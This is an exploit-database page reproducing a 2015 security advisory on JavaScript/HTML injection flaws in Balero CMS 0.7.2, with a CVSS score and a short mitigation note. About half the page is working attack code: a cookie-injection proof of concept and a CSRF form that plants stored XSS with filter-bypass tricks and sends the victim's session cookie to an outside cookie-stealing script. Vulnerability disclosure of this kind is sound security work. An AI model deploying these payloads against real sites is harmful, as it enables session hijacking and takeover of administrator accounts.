header-logo
Suggest Exploit
vendor:
Balero CMS
by:
Gjoko 'LiquidWorm' Krstic
7.5
CVSS
HIGH
Multiple JS/HTML Injection
79
CWE
Product Name: Balero CMS
Affected Version From: 2000.7.2
Affected Version To: 2000.7.2
Patch Exists: YES
Related CWE: N/A
CPE: a:balerocms_software:balero_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Apache 2.4.10 (Win32), PHP 5.6.3, MySQL 5.6.21
2015

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Input passed to the 'content' POST parameter and the cookie 'counter' is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to update a web page in an unsafe way.
Source

Exploit-DB raw data:

<!--

Balero CMS v0.7.2 Multiple JS/HTML Injection Vulnerabilities

Vendor: BaleroCMS Software
Product web page: http://www.balerocms.com
Affected version: 0.7.2

Summary: Balero CMS is an open source project that can help you manage
the page of your company with just a few guided steps, minimizing the
costs that many companies make to have your advertising medium and/or
portal.

Desc: Input passed to the 'content' POST parameter and the cookie 'counter'
is not properly sanitised before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in context of an affected site.

Tested on: Apache 2.4.10 (Win32)
           PHP 5.6.3
           MySQL 5.6.21


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5239
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5239.php


04.03.2015

-->


<html>
  <body>
    <script>
      document.cookie="counter=1<script>confirm('XSS')</script>; path=/balerocms/";
    </script>
  </body>
</html>


csrf+stored xss+filter bypass+session hijack:

<html>
  <body>
    <form action="http://localhost/balerocms/admin/edit_delete_post/mod-blog" method="POST">
      <input type="hidden" name="title" value="ZSL" />
      <input type="hidden" name="content" value="pwned&lt;/textarea&gt;<s\cript>document.location="http://www.zeroscience.mk/pentest/cthief.php?cookie="+docu\ment.cookie;</s\cript>" />
      <input type="hidden" name="files" value="joxy.poxy" />
      <input type="hidden" name="delete_post[]" value="135" />
      <input type="hidden" name="id" value="135" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Navigation

Suggest Exploit

Services By CQR